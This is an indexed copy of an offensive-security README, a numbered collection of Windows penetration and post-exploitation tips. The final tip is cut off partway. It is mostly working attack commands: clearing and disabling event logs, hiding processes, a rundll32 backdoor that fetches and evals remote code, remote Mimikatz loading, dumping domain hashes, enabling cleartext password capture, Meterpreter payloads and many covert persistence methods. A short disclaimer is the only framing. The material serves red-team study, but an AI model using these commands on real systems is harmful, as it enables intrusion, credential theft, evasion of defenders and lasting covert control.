Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/3gstudent/pentest-and-development-tips
A collection of pentest and development tips
https://github.com/3gstudent/pentest-and-development-tips
Last synced: 3 months ago
JSON representation
A collection of pentest and development tips
- Host: GitHub
- URL: https://github.com/3gstudent/pentest-and-development-tips
- Owner: 3gstudent
- Created: 2017-09-07T01:07:53.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2022-05-26T02:51:51.000Z (over 2 years ago)
- Last Synced: 2024-10-26T11:32:39.372Z (3 months ago)
- Homepage:
- Size: 360 KB
- Stars: 1,103
- Watchers: 57
- Forks: 306
- Open Issues: 2
-
Metadata Files:
- Readme: README-en.md
Awesome Lists containing this project
- awesome-security-collection - **633**星
README
# Pentest-and-Development-Tips
A collection of pentest and development tipsAuthor: 3gstudent
### Statement
The following techniques should not be used for illegal purposes.
---
### Tips 1. Manual port detection
Nmap's -sV can detect the service version, but in some cases it must be manually detected to verify.
Use Wireshark to get response packages is far less simple than using nc.
Eg.
For port 8001, use nc to connect the port and then enter a random string. You'll get the following result:
```
$ nc -vv localhost 8001
localhost [127.0.0.1] 8001 (?) open
asd
HTTP/1.1 400 Bad Request
Date: Fri, 25 Aug 2017 12:15:25 GMT
Server: Apache/2.4.23 (Debian)
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1400 Bad Request
Bad Request
Your browser sent a request that this server could not understand.
Apache/2.4.23 (Debian) Server at 127.0.0.1 Port 8001```
From this we know that this is an http service, because the string we sent is not a valid HTTP request, so we return a 400 Bad requests, we also get the system version is Debian, WebServer is Apache.
Reference:
[《谈谈端口探测的经验与原理》](http://www.freebuf.com/articles/network/146087.html)
---
### Tips 2. Download files from Kali to windows
Kali:
```
python -m SimpleHTTPServer 80
```Windows:
```
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
```Reference:
[《渗透测试中的certutil.exe》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84certutil.exe)
---
### Tips 3. Configure the computer in WORKGROUP to support the IPC connection
Add user:
```
net user test test /add
net localgroup administrators test /add
```Modify the registry to support remote connections:
```
reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
```IPC connection:
```
net use \\192.168.1.195 test /u:test
```---
### Tips 4. Cleanup the Windows XML Event Log(evtx)
Get a list of evtx log categories:
```
wevtutil el >1.txt
```Get statistics for a single evtx log category:
Eg.
```
wevtutil gli "windows powershell"
```Output:
```
creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1
```View the specific content of the specified evtx log:
```
wevtutil qe /f:text "windows powershell"
```Find the specified amount of log content:
```
wevtutil qe /f:text "windows powershell" /c:20
```Delete all information for a single log category:
```
wevtutil cl "windows powershell"
```Reference:
[《渗透技巧-Windows日志的删除与绕过》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87)
Remove individual lines from Windows XML Event Log (EVTX) files:
[《渗透技巧——Windows单条日志的删除》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4)
---
### Tips 5. Destroy the Event Log Service
The thread that implements the logging function is terminated by calling TerminateThread, which disables the logging function, but the Windows Event Log service is not destroyed and the state is still running.
Powershell:
https://github.com/hlldz/Invoke-Phant0m
C++:
https://github.com/3gstudent/Windwos-EventLog-Bypass
Reference:
[《渗透技巧-Windows日志的删除与绕过》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87)
[《利用API-NtQueryInformationThread和I_QueryTagInformation实现对Windwos日志监控的绕过》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8API-NtQueryInformationThread%E5%92%8CI_QueryTagInformation%E5%AE%9E%E7%8E%B0%E5%AF%B9Windwos%E6%97%A5%E5%BF%97%E7%9B%91%E6%8E%A7%E7%9A%84%E7%BB%95%E8%BF%87)
---
### Tips 6. Process hiding under Win7 and Windows Server 2008 R2
Use global APIhooks to modify the registry.
Download project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz
Modify the code to specify the program name cldr.exe to be hidden, compile into cldr.dll, cldr.dll in `C:\ProgramData\Microsoft\HelpLibrary\`
Administrator privileges:
```
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f
```At this time, cldr.exe does not exist in the task manager process list, cldr.exe does not exist in Process Explorer, and cldr.exe does not exist in Tasklist.exe.
For 64-bit systems:
Administrator privileges:
```
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldrx64.dll" /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f
```Reference:
[《利用globalAPIhooks在Win7系统下隐藏进程》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8globalAPIhooks%E5%9C%A8Win7%E7%B3%BB%E7%BB%9F%E4%B8%8B%E9%9A%90%E8%97%8F%E8%BF%9B%E7%A8%8B)
---
### Tips 7. Execution order of exe and com files with the same name
If a path contains both exe and com files with the same name, such as test.exe and test.com. Enter test (without the file suffix) through the command line, and the com file will be run first.
The generation of COM files only needs to change the suffix name of the exe file to com.
Reference:
《A dirty way of tricking users to bypass UAC》
---
### Tips 8. Windows system certificate generation and registration
Certificate generation and signature:
```
makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer
cert2spc Root.cer Root.spc
pvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f
signtool sign /f Root.pfx /p 12345678password test.exe
```It will generate four files: Root.cer, Root.pfx, Root.pvk, and Root.spc, and test.exe will be digitally signed.
Certificate registration:
Add the certificate to localmachine(Administrator privileges):
```
certmgr.exe -add -c Root.cer -s -r localmachine root
```Reference:
《A dirty way of tricking users to bypass UAC》
---
### Tips 9. Use HTML Application(hta) to run VBScript, and then use VBScript to run Powershell scipt
test.hta:
```
Set WshShell = CreateObject("WScript.Shell")
Connect="powershell -nop -windows hidden -E YwBhAGwAYwAuAGUAeABlAA=="
WshShell.Run Connect, 4, true
```Reference:
《Bypass McAfee Application Control——Code Execution》
---
### Tips 10. Write dll by c# and load dll via rundll32.exe or regsvr32
By default, c# cannot declare exported functions, but can be implemented by adding UnmanagedExports.
Of course, dlls written by c# need to be run in the corresponding version of the .NET environment. The dlls written in C++ are more general.
The dll can be loaded by rundll32.exe or regsvr32, but the dll is required to contain a specific export function.
Reference:
《Code Execution of Regsvr32.exe》
---
### Tips 11. Introduction to cpl file under Windows
Essentially a DLL file with a suffix of cpl and an export function CPLApplet.
Five methods of implementation:
(1) Double click to run directly
(2) cmd
```
rundll32 shell32.dll,Control_RunDLL test.cpl
```(3) cmd
```
control test.cpl
```(4) vbs
```
Dim obj
Set obj = CreateObject("Shell.Application")
obj.ControlPanelItem("test.cpl")
```(5) js
```
var a = new ActiveXObject("Shell.Application");
a.ControlPanelItem("c:\\test\\test.cpl");
```Reference:
《CPL文件利用介绍》
---
### Tips 12. Use rundll32 via cmd to execute a piece of code to get a shell of Windows
Server:
https://github.com/3gstudent/Javascript-Backdoor/blob/master/JSRat.ps1
Client:
```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
```Of course, the RAT tool can also be loaded by:
- vbs
- js
- exe
- dll
- shellcodeReference:
《JavaScript Backdoor》
《JavaScript Phishing》
---
### Tips 13. The key of putty&pageant can be restored by memory dump
Both windows and Linux apply
Reference:
《Memory Dump利用实例》
---
### Tips 14. Phishing for Visual Studio
Visual C++:
- Modify the .vcxproj fileVisual Basic:
- Modify the .vbproj fileVisual F#:
- Modify the .fsproj fileAbility to execute arbitrary code when compiling for any of the above projects using Visual Studio
Reference:
《Pay close attention to your download code——Visual Studio trick to run code when building》
---
### Tips 15. When a 32-bit program is executed under a 64-bit Windows system, there is a redirect if there is an operation on the registry and files.
For registry operations:
The actual path to access HKLM\Software\ is HKLM\Software\Wow6432Node\
For file operations:
The actual path to access c:\windows\Sysnative\ is c:\windows\system32\
The actual path to access c:\windows\system32\ is c:\windows\SysWOW64\Reference:
《关于32位程序在64位系统下运行中需要注意的重定向问题》
---
### Tips 16. Dump all the hash of the domain user from the domain controller
#### Method 1:
Copy ntds.dit:
Use NinjaCopy, https://github.com/3gstudent/NinjaCopy (Author: Joe Bialek, Twitter: @JosephBialek)
Dump hash:
Use quarkspwdump, https://github.com/quarkslab/quarkspwdump
```
esentutl /p /o ntds.dit
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt
```#### Method 2:
Use DSInternals PowerShell Module, https://www.dsinternals.com/wp-content/uploads/DSInternals_v2.8.zip
Applicable conditions:
Windows PowerShell 3.0 or 3.0+
.NET Framework 4.0 or 4.0+
Reference:
《导出当前域内所有用户hash的技术整理》
《利用Powershell快速导出域控所有用户Hash》
#### Method 3:
mimikatz:
```
mimikatz.exe "lsadump::dcsync /domain:test.local /all /csv" exit
```---
### Tips 17. Dump Clear-Text Password under Windows
Windows Server 2012 cannot use mimikatz to export clear-text password by default, as are some Windows Server 2008.
Workaround: Enable Wdigest Auth
cmd:
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```or
powershell:
```
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
```Restart or user login again, can export clear-text password
Reference:
《域渗透——Dump Clear-Text Password after KB2871997 installed》
---
### Tips 18. The new password of the domain controller can be recorded in real time through Hook PasswordChangeNotify.
Of course, you can choose to save locally or upload your password to the server.
Reference:
《域渗透——Hook PasswordChangeNotify》
---
### Tips 19. Remember to pay attention to the local administrator account of the host in the domain
If the administrator neglects that the hosts in the domain use the same local administrator account, you can remotely log in to other hosts in the domain through pass-the-hash.
Reference:
《域渗透——Local Administrator Password Solution》
---
### Tips 20. Get the dll export function through powershell
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-Exports.ps1
```
Get-Exports -DllPath c:\Windows\system32\dimsjob.dll -ExportsToCpp C:\test\export.txt
```Reference:
[《Study Notes Weekly No.3(Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)》](https://3gstudent.github.io/Study-Notes-Weekly-No.3(Use-odbcconf-to-load-dll-&-Get-Exports-&-ETW-USB-Keylogger))
---
### Tips 21. Parameter hiding tips for shortcuts
Put the payload after 260 null characters, so you can't view the payload in the file attribute. It can be used to hide the payload in the shortcut, trick the user to click, and conceal the execution code.
Reference:
[《渗透技巧——快捷方式文件的参数隐藏技巧》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E6%96%87%E4%BB%B6%E7%9A%84%E5%8F%82%E6%95%B0%E9%9A%90%E8%97%8F%E6%8A%80%E5%B7%A7)
---
### Tips 22. 32-bit programs can remotely inject 64-bit processes
POC:
https://github.com/3gstudent/CreateRemoteThread/blob/master/CreateRemoteThread32to64.cpp
Reference:
[《32位程序对64位进程的远程注入实现》](https://3gstudent.github.io/32%E4%BD%8D%E7%A8%8B%E5%BA%8F%E5%AF%B964%E4%BD%8D%E8%BF%9B%E7%A8%8B%E7%9A%84%E8%BF%9C%E7%A8%8B%E6%B3%A8%E5%85%A5%E5%AE%9E%E7%8E%B0)
---
### Tips 23. The process needs to be downgraded in some cases
Processes that use sytem permissions may encounter the following issues:
1. Unable to get the current user's file content
For example, the user's screen cannot be captured
2. Environmental variables are different
Therefore need to reduce the rights to the current user
#### Method 1: Use SelectMyParent.exe
https://github.com/3gstudent/From-System-authority-to-Medium-authority
Reference:
[《渗透技巧——程序的降权启动》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A8%8B%E5%BA%8F%E7%9A%84%E9%99%8D%E6%9D%83%E5%90%AF%E5%8A%A8)
#### Method 2: Use msdtc
Use msdtc will load oci.dll with system privilege, but execute it in the admin privilege cmd: `msdtc -install`, it will start calc.exe with high permission.
Reference:
[《Use msdtc to maintain persistence》](https://3gstudent.github.io/Use-msdtc-to-maintain-persistence)
---
### Tips 24. You can install WinPcap on Windows by command line, so you can use nmap and Masscan on the host you already control
Reference:
[《渗透技巧——Windows平台运行Masscan和Nmap》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E5%B9%B3%E5%8F%B0%E8%BF%90%E8%A1%8CMasscan%E5%92%8CNmap)
---
### Tips 25. How to execute mimikatz on Windows platform
#### Method 1: Use powershell
```
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
```#### Method 2: Use InstallUtil.exe
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
```Reference:
《利用白名单绕过360实例》
《利用白名单绕过限制的更多测试》
#### Method 3: Use regsvr32.exe
https://gist.githubusercontent.com/subTee/c3d5030bb99aa3f96bfa507c1c184504/raw/24dc0f93f1ebdda7c401dd3890259fa70d23f75b/regsvr32-katz.cs
Encapsulate mimikatz into dll and run mimkatz via regsvr32 passed in parameters
```
rundll32 katz.dll,EntryPoint log coffee exit
```Reference:
《Code Execution of Regsvr32.exe》
#### Method 4: Use msbuild.exe
Download the xml file and save it as a.xml:
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20mimikatz.xml
cmd:
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe executes a.xml
```Reference:
[《Use MSBuild To Do More》](https://3gstudent.github.io/Use-MSBuild-To-Do-More)
#### Method 5: Use csi.exe
```
"C:\Program Files (x86)\MSBuild\14.0\Bin\csi.exe" c:\test\katz.csx
```Reference:
[《Study Notes Weekly No.4(Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)》](https://3gstudent.github.io/Study-Notes-Weekly-No.4(Use-tracker-to-load-dll-&-Use-csi-to-bypass-UMCI-&-Execute-C-from-XSLT-file))
#### Method 6: Use the js/vbs script
https://gist.github.com/subTee/5c636b8736530fb20c3d
https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f
Reference:
[《利用JS加载.Net程序》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8JS%E5%8A%A0%E8%BD%BD.Net%E7%A8%8B%E5%BA%8F)
---
### Tips 26. The location in the Windows system where you can store and read the payload.
#### Method 1: WMI
Save:
```
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('Command' , $Payload)
$StaticClass.Put()
```Read:
```
$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value
```Reference:
《WMI Backdoor》
#### Method 2: PE file containing digital signature
Use the algorithm flaw of the file hash, hide the Payload from the PE file without affecting the digital signature of the PE file.
Reference:
[《隐写技巧-在PE文件的数字证书中隐藏Payload》](https://3gstudent.github.io/%E9%9A%90%E5%86%99%E6%8A%80%E5%B7%A7-%E5%9C%A8PE%E6%96%87%E4%BB%B6%E7%9A%84%E6%95%B0%E5%AD%97%E8%AF%81%E4%B9%A6%E4%B8%AD%E9%9A%90%E8%97%8FPayload)
#### Method 3: Special ADS
(1) ...
```
type putty.exe > ...:putty.exe
wmic process call create c:\test\ads\...:putty.exe
```(2) Special COM files
```
type putty.exe > \\.\C:\test\ads\COM1:putty.exe
wmic process call create \\.\C:\test\ads\COM1:putty.exe
```(3) Disk root directory
```
type putty.exe >C:\:putty.exe
wmic process call create C:\:putty.exe
```Reference:
[《Hidden Alternative Data Streams的进阶利用技巧》](https://3gstudent.github.io/Hidden-Alternative-Data-Streams%E7%9A%84%E8%BF%9B%E9%98%B6%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7)
---
### Tips 27. Information worth collecting in Windows system
#### (1) Registered WMI information
```
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list
```The administrator may use WMI to record the attacker's call to WMI, which can be viewed by wmic. Of course, the monitoring function can be disabled by wmic.
Reference:
[《Study Notes Weekly No.1(Monitor WMI & ExportsToC++ & Use DiskCleanup bypass UAC))》](https://3gstudent.github.io/Study-Notes-Weekly-No.1(Monitor-WMI_ExportsToC++_Use-DiskCleanup-bypass-UAC))
#### (2)Computer Name
```
wmic /node:192.168.1.10 /user:"administrator" /password:"123456" /NAMESPACE:"\\root\CIMV2" PATH Win32_OperatingSystem get CSName
```---
### Tips 28. Meterpreter under Windows
#### Method 1: Loading dll via rundll32
msf:
```
msfvenom -p windows/meterpreter/reverse_http -f dll LHOST=192.168.174.133 LPORT=8080>./a.dll
```Generate a.dll and upload it to the host
Execute `rundll32.exe a.dll, Control_RunDLL`,
#### Method 2: Via cpl
https://raw.githubusercontent.com/3gstudent/test/master/meterpreter_reverse_tcp.cpp
Generate dll, rename it to cpl, double click to execute
#### Method 3: Via powershell
https://raw.githubusercontent.com/3gstudent/Code-Execution-and-Process-Injection/master/2-CodeExecution-Meterpreter.ps1
---
### Tips 29. How to load dll in Windows system
#### Method 1: rundll32
```
rundll32 a.dll,EntryPoint
```#### Method 2:regsvr32
```
regsvr32 a.dll
```Reference:
《Code Execution of Regsvr32.exe》
#### Method 3:odbcconf
```
odbcconf.exe /a {regsvr c:\test\odbcconf.dll}
```Reference:
[《Study Notes Weekly No.3(Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)》](https://3gstudent.github.io/Study-Notes-Weekly-No.3(Use-odbcconf-to-load-dll-&-Get-Exports-&-ETW-USB-Keylogger))
#### Method 4:Tracker
```
Tracker.exe /d test.dll /c svchost.exe
```Tracker.exe contains Microsoft digital signatures that bypass the limitations of the application whitelist
Reference:
[《Study Notes Weekly No.4(Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)》](https://3gstudent.github.io/Study-Notes-Weekly-No.4(Use-tracker-to-load-dll-&-Use-csi-to-bypass-UMCI-&-Execute-C-from-XSLT-file))
#### Method 5: Excel.Application object's RegisterXLL() method
Prerequisite: Microsoft Office software is installed
1.rundll32
```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\test\\messagebox.dll');this.close();
```2.js
```
var excel = new ActiveXObject("Excel.Application");
excel.RegisterXLL("C:\\test\\messagebox.dll");
```3.powershell
```
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL("C:\test\messagebox.dll")
```Reference:
[《Use Excel.Application object's RegisterXLL() method to load dll》](https://3gstudent.github.io/Use-Excel.Application-object's-RegisterXLL()-method-to-load-dll)
#### Method 6: xwizard.exe
Copy xwizard.exe from %windir%\system32\ to the new directory C:\x.
Rename msg.dll to xwizards.dll and save it at C:\x.
Command line execution:
```
xwizard processXMLFile 1.txt
```It will load C:\x\xwizards.dll.
Reference:
[《Use xwizard.exe to load dll》](https://3gstudent.github.io/Use-xwizard.exe-to-load-dll)
---
### Tips 30. Windows Persistence
#### Method 1: bitsadmin
```
bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
bitsadmin /Resume backdoor
```Reference:
《Use bitsadmin to maintain persistence and bypass Autoruns》
#### Method 2: mof
```
pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP1";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 1";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consP1";
ScriptingEngine = "JScript";
ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
```Administrator privileges:
```
mofcomp test.mof
```Reference:
《WSC、JSRAT and WMI Backdoor》
#### Method 3: wmiExecute notepad.exe every 60 seconds
```
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
```Reference:
[《Study Notes of WMI Persistence using wmic.exe》](https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe)
#### Method 4: Userland Persistence With Scheduled Tasks
Hijack the scheduled task UserTask, load testmsg.dll at system startup.
The operation is as follows:
Create a new item under HKEY_CURRENT_USER\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}
Then create a new item InprocServer32
The value is set to `c:\test\testmsg.dll`
Testmsg.dll contains the following export functions:
- DllCanUnloadNow
- DllGetClassObject
- DllRegisterServer
- DllUnregisterServerWaiting for users to log in again.
Reference:
[《Userland registry hijacking》](https://3gstudent.github.io/Userland-registry-hijacking)
#### Method 5: Netsh
The helper DLL needs to include the export function InitHelperDll.
Administrator privileges:
```
netsh add helper c:\test\netshtest.dll
```After the helper dll is successfully added, c:\test\netshtest.dll will be loaded each time netsh is called.
Reference:
[《Netsh persistence》](https://3gstudent.github.io/Netsh-persistence)
#### Method 6: Shim
Common ways:
- InjectDll
- RedirectShortcut
- RedirectEXE[《渗透测试中的Application Compatibility Shims》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims)
#### Method 7: dll hijacking
Automatically enumerate processes through Rattler to detect the existence of available dll hijacking processes.
path:
- c:\windows\midimap.dll
Reference:
[《DLL劫持漏洞自动化识别工具Rattler测试》](https://3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95)
#### Method 8: DoubleAgent
Write a custom Verifier provider DLL.
Install via Application Verifier.
Inject into the target process to execute the payload.
Whenever the target process starts, it will execute payload, which is equivalent to a self-starting method.
Reference:[《渗透测试中的Application Verifier(DoubleAgent利用介绍)》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D))
#### Method 9: waitfor.exe
Self-starting is not supported, but can be activated remotely, and the process is displayed as waitfor.exe
Reference:
[《Use Waitfor.exe to maintain persistence》](https://3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence)
#### Method 10: AppDomainManager
For .Net programs, they can be hijacked by modifying the AppDomainManager.
If you hijack the startup process of a system common .Net program such as powershell.exe and add a payload to it, you can implement a passive backdoor trigger mechanism.Reference:
[《Use AppDomainManager to maintain persistence》](https://3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence)
#### Method 11: Office Add-ins
If the office software is already installed, you can implement hijacking by configuring the Office add-in as a passive backdoor.
Commonly used methods:
- Word WLL
- Excel XLL
- Excel VBA add-ins
- PowerPoint VBA add-insPOC: https://github.com/3gstudent/Office-Persistence
Reference:
[《Use Office to maintain persistence》](https://3gstudent.github.io/Use-Office-to-maintain-persistence)
[《Office Persistence on x64 operating system》](https://3gstudent.github.io/Office-Persistence-on-x64-operating-system)
#### Method 12: CLR
Backdoor without administrator privileges and the ability to hijack all .Net programs.
POC: https://github.com/3gstudent/CLR-Injection
Reference:
[《Use CLR to maintain persistence》](https://3gstudent.github.io/Use-CLR-to-maintain-persistence)
#### Method 13: msdtc
Use the MSDTC service to load dlls, implement self-starting, and bypass Autoruns to detect startup items.
Reference:
[《Use msdtc to maintain persistence》](https://3gstudent.github.io/Use-msdtc-to-maintain-persistence)
#### Method 14: Hijack CAccPropServicesClass and MMDeviceEnumerator
No need to reboot the system, no administrator privileges required.
Implemented by modifying the registry/POC: https://github.com/3gstudent/COM-Object-hijacking
Reference:
[《Use COM Object hijacking to maintain persistence——Hijack CAccPropServicesClass and MMDeviceEnumerator》](https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator)
#### Method 15: Hijack explorer.exe
No need to reboot the system, no administrator privileges required
Implemented by modifying the registry
Reference:
[《Use COM Object hijacking to maintain persistence——Hijack explorer.exe》](https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe)
#### Method 16: Windows FAX DLL Injection
By DLL hijacking, hijacking Explorer.exe to load fxsst.dll.
Explorer.exe will load `c:\Windows\System32\fxsst.dll` at startup (service is enabled by default for fax service)
Save the payload.dll in c:\Windows\fxsst.dll, which can implement dll hijacking, hijacking Explorer.exe to load fxsst.dll.
The same idea:
Rename payload.dll to linkinfo.dll and hijack Explorer.exe to load linkinfo.dll。
#### Method 17: Hijack specific features of Office software
By dll hijacking, triggers backdoors when Office software performs certain functions.
Reference:
[《利用BDF向DLL文件植入后门》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8)
#### Method 18: Special Registry Keys
Create a special name for the registry key, which the user normally cannot read (use the Win32 API), but the system can execute (use the Native API)
Reference:
[《渗透技巧——"隐藏"注册表的创建》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA)
[《渗透技巧——"隐藏"注册表的更多测试》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95)
#### Method 19: Powershell Configuration File
Modify the powershell configuration file, the backdoor is triggered after the powershell process starts.
Check to see if you are using a configuration file:
```
Test-Path $profile
```Create a configuration file:
```
New-Item -Path $profile -Type File –Force
```Modify the contents of the configuration file and add a backdoor:
```
$string = 'Start-Process "cmd.exe"'
